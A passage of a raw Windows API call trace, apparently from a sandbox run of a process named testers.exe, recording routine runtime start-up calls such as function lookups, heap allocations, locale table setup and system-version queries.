[0256.419] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0256.420] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0256.420] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0256.420] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0256.420] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0256.420] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0256.420] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0256.420] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0256.421] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0256.421] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0256.421] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0256.421] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0256.421] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0256.421] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0256.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x3bc) returned 0xbe1f08 [0256.422] GetCurrentThreadId () returned 0x330 [0256.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xbd2a08 [0256.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x800) returned 0xbe22d0 [0256.423] GetStartupInfoW (in: lpStartupInfo=0x7ffea0 | out: lpStartupInfo=0x7ffea0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0x6196771d, hStdError=0x0)) [0256.423] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0256.423] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0256.423] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0256.423] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe" [0256.423] GetEnvironmentStringsW () returned 0xbe2ad8* [0256.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xaca) returned 0xbe35b0 [0256.423] FreeEnvironmentStringsW (penv=0xbe2ad8) returned 1 [0256.423] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0256.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4a) returned 0xbd2a28 [0256.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x98) returned 0xbe2ad8 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x3e) returned 0xbd2120 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x6c) returned 0xbe2b78 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x6e) returned 0xbe2bf0 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x78) returned 0xbcf860 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x62) returned 0xbe2c68 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x2e) returned 0xbdc588 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x48) returned 0xbd81a0 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x28) returned 0xbdbfe0 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x1a) returned 0xbdfb20 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x4a) returned 0xbe2cd8 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x72) returned 0xbcf8e0 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x30) returned 0xbdc5c0 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x2e) returned 0xbdc5f8 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x1c) returned 0xbdfb48 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0xd2) returned 0xbe2d30 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x7c) returned 0xbe2e10 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x36) returned 0xbe2e98 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x3a) returned 0xbd2168 [0256.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x90) returned 0xbe2ed8 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x24) returned 0xbdc010 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x30) returned 0xbdc630 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x36) returned 0xbe2f70 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x48) returned 0xbd81f0 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x52) returned 0xbe2fb0 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x3c) returned 0xbd21b0 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x82) returned 0xbe3010 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x2e) returned 0xbdc668 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x1e) returned 0xbdfb70 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x2c) returned 0xbdc6a0 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x54) returned 0xbe40a0 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x52) returned 0xbe4100 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x2a) returned 0xbdc6d8 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x3c) returned 0xbd21f8 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x54) returned 0xbe4160 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x24) returned 0xbdc040 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x30) returned 0xbdc710 [0256.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x8c) returned 0xbe30a0 [0256.425] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe35b0 | out: hHeap=0xbc0000) returned 1 [0256.428] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x80) returned 0xbe3138 [0256.428] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x8, Size=0x800) returned 0xbe31c0 [0256.428] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0256.429] GetLastError () returned 0x0 [0256.429] SetLastError (dwErrCode=0x0) [0256.429] GetLastError () returned 0x0 [0256.429] SetLastError (dwErrCode=0x0) [0256.429] GetLastError () returned 0x0 [0256.429] SetLastError (dwErrCode=0x0) [0256.429] GetACP () returned 0x4e4 [0256.429] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x220) returned 0xbe39c8 [0256.429] GetLastError () returned 0x0 [0256.429] SetLastError (dwErrCode=0x0) [0256.429] IsValidCodePage (CodePage=0x4e4) returned 1 [0256.429] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x7ffe94 | out: lpCPInfo=0x7ffe94) returned 1 [0256.429] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x7ff95c | out: lpCPInfo=0x7ff95c) returned 1 [0256.429] GetLastError () returned 0x0 [0256.429] SetLastError (dwErrCode=0x0) [0256.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffd70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0256.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffd70, cbMultiByte=256, lpWideCharStr=0x7ff6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0256.430] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x7ff970 | out: lpCharType=0x7ff970) returned 1 [0256.430] GetLastError () returned 0x0 [0256.430] SetLastError (dwErrCode=0x0) [0256.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffd70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0256.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffd70, cbMultiByte=256, lpWideCharStr=0x7ff6a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0256.430] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0256.430] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x7ff498, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0256.430] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x7ffc70, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿmv\x96a¬þ\x7f", lpUsedDefaultChar=0x0) returned 256 [0256.430] GetLastError () returned 0x0 [0256.430] SetLastError (dwErrCode=0x0) [0256.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffd70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0256.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffd70, cbMultiByte=256, lpWideCharStr=0x7ff6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā") returned 256 [0256.430] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0256.430] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x7ff4b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0256.430] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x7ffb70, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿmv\x96a¬þ\x7f", lpUsedDefaultChar=0x0) returned 256 [0256.431] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0256.431] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0256.431] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.431] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.432] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x3c) returned 0xbd2240 [0256.432] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.432] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3300 [0256.432] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbd2a80 [0256.432] GetVersionExW (in: lpVersionInformation=0x7ffd88*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x7ffd88*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0256.432] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd3300 | out: hHeap=0xbc0000) returned 1 [0256.432] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbdfbc0 [0256.433] GetCurrentProcess () returned 0xffffffff [0256.433] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x7ffed8 | out: Wow64Process=0x7ffed8) returned 1 [0256.433] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0256.433] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0256.433] GetNativeSystemInfo (in: lpSystemInfo=0x7ffea4 | out: lpSystemInfo=0x7ffea4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0256.433] FreeLibrary (hLibModule=0x75990000) returned 1 [0256.434] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.434] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbd3300 [0256.434] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.434] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3318 [0256.434] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe4038 [0256.434] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3330 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe4048 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3348 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe4058 [0256.435] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, 